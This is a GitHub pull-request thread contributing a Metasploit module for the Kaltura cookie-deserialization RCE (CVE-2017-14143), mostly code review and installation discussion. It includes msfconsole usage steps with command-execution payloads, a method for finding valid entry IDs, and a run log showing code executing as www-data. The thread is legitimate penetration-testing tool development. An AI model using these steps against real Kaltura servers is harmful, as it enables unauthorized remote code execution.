Add module for Kaltura <= 13.1.0 RCE (CVE-2017-14143)

[rverton]

This PR adds a module to exploit the Kaltura <= 13.1.0 RCE via a cookie deserialization.

Verification example

• Start msfconsole
• use exploit/linux/http/kaltura_unserialize_cookie_rce
• set RHOST host.com
• set ENTRYID 0_kzn07urz
• set payload generic/custom
• set payloadstr "system('uname -a');"
• run

[mdisec]

It's awesome to see that people continue the work and pick up the flag from where we left it.

[mdisec]

Use vars_get for GET parameters.
Use normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries') format. normalize_uri will concatenate them for you.

Example: #8980

[rverton]

Using the 'keditorservices,getAllEntries' syntax did not work, but 'keditorservices', 'getAllEntries' did.

Personally I do not find this cleaner than 'index.php/keditorservices/getAllEntries', but I will stick with the (slightly adjusted) suggestion from you now.

[rverton]

Oh, I guess it was a typo ;)

[mdisec]

Yes, it was typo sorry. Also, this was what maintainers suggested to me when I send my first PR ;)

[mdisec]

Same here.

Use vars_get for GET parameters.
Use normalize_uri(target_uri.path, 'index.php', 'keditorservices, 'getAllEntries') format. normalize_uri will concatenate them for you.

Example: #8980

[mdisec]

Use single quote. print_error('Unexpected response...')

[mdisec]

As far as I can understand, you need to use valid entry_id. So why don't you directly send HTTP request to the [target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l and look for 0_28bwo20l at the returned XML file.

Valid entryid:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_28bwo20l

Response

<assets>
<asset id="0_28bwo20l" name="PAISD Mobile App Video" media_type="1" kshow_id="0_duymlto7" url="/content/entry/data/4/278/0_28bwo20l_" ready="1" thumbnail_path="/content/entry/thumbnail/4/278/0_28bwo20l_100001.jpg" credit="rpicon" source_link="file:/opt/kaltura/web/content/uploads/8221424122327.1663_1wfwuh0mo0wck8ccgokg.mov_.mov" duration="283" list_type="show" contributor_screen_name="ANONYMOUS"/>
</assets>

Unvalid entryid:
http://[target.com]/index.php/keditorservices/getAllEntries?list_type=15&entry_id=0_ffffffff

response

<assets>

</assets>

[mdisec]

Also adding module documentation to this PR would be awesome.

[mdisec]

Do you really need to use self and () in here ? I sense python developer in here :-)

[mdisec]

Shouldn't we check validity of entry_id way before ? I would call check_entryid at the very beginning of check and exploit functions.

[rverton]

I want to keep the number of requests as low as possible, so check should only test for an invalid id if the request before failed and exploit should not check for a valid id every time a call is made. I'll remove the self. and ().

[mdisec]

Instead of defining cookie within headers, you could directly use it as a parameter of send_request_cgi method.
Example

res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, 'blabla'),
      'cookie' => cookie
    })

[bwatters-r7]

Hi there; would you please add documentation to this PR? You can see more about it here: https://github.com/rapid7/metasploit-framework/wiki/Writing-Module-Documentation

[Pushpamk]

@bwatters-r7 Where should I attach documentation for this PR?

[bwatters-r7]

@Pushpamk, please add a separate markdown document as specified in the guidance:

Save the file and name it after the module name. For example, the filename for ms08-067 is modules/exploits/windows/smb/ms08_067_netapi.rb, so its documentation is documentation/modules/exploits/windows/smb/ms08_067_netapi.md

[rverton]

Sorry, I'm late to the party. I see @Pushpamk already made a new PR for this, awesome! Is there still something needed from me?

[bwatters-r7]

@rverton no worries; I love to see the community coming together! I have not gotten a chance to dig too much into this, but a quick run of rubocop (https://github.com/rapid7/metasploit-framework/wiki/Using-Rubocop) shows there are some stylistic hiccups in the code that could stand updates. The only thing I saw that I'd say has to change is some indention mix-ups around line 142. If you get a chance, please check out that wiki article and run the code through rubocop for some stylistic changes. Not everything rubocop flags needs to be changed, as the document states, but I do take rubocop's suggestions to heart when I can. Otherwise, this just needs me to finish up some other tasks so it comes up in my queue. Thanks!

[rverton]

@bwatters-r7 all right, I just added the stylistic things suggested from rubocop. I hope this fits better now ;)

[bwatters-r7]

I ran through https://github.com/kaltura/platform-install-packages/blob/Mercury-13.8.0/doc/install-kaltura-deb-based.md to try and install kaltura, but it failed both times, probably because I'm unfamiliar with the application. Is there an easier/faster installer around?

[rverton]

Setting up kaltura was time-consuming. I failed several times until I noticed that you need to have a good amount of memory available, otherwise it will fail with strange error messages during the installation. The setup script is also error prone. I don't have a faster way to install, sorry :/

[bwatters-r7]

When you say "a good amount," can you quantify that? 1GB, 8 GB? 32 GB?

[rverton]

A 512MB VM failed for me, a 2GB one worked.

[bwatters-r7]

If you have a pcap of this working, please send it in. I have not had time to try building Kaltura again.

[rverton]

Hi @bwatters-r7,
I agree, building an old version is time consuming. I found an old Kaltura version here in a Vagrant machine. It's 13.4 but with the old and vulnerable kalturaAction.class.php file before it was fixed here.

This is the execution:

$ cat msf.rc 
use exploit/linux/http/kaltura_unserialize_cookie_rce
set RHOST pwnbox
set RPORT 8080
set PAYLOAD generic/custom
set PAYLOADSTR "system('id');"
set ENTRYID 0_b45ita8n
check
run
exit
$ msfconsole -r msf.rc 
[...snip...]
[*] Processing msf.rc for ERB directives.
resource (msf.rc)> use exploit/linux/http/kaltura_unserialize_cookie_rce
resource (msf.rc)> set RHOST pwnbox
RHOST => pwnbox
resource (msf.rc)> set RPORT 8080
RPORT => 8080
resource (msf.rc)> set PAYLOAD generic/custom
PAYLOAD => generic/custom
resource (msf.rc)> set PAYLOADSTR "system('id');"
PAYLOADSTR => system('id');
resource (msf.rc)> set ENTRYID 0_b45ita8n
ENTRYID => 0_b45ita8n
resource (msf.rc)> check
[+] pwnbox:8080 The target is vulnerable.
resource (msf.rc)> run
[*] Output: uid=33(www-data) gid=33(www-data) groups=33(www-data)

[*] Exploit completed, but no session was created.
resource (msf.rc)> exit

I also attached a tcpdump:
kaltura_rce.dump.zip

[bwatters-r7]

Thanks, @rverton! Likely not going to get to it this week, but I will try to review it next week.

[bwatters-r7]

Release Notes

The exploits/linux/http/kaltura_unserialize_cookie_rce module has been added to the framework. It allows remote code execution through Kaltura video server software versions prior to 13.1.0. A valid entry_id is required for this exploit, and can be obtained from any media resource published on the kaltura installation.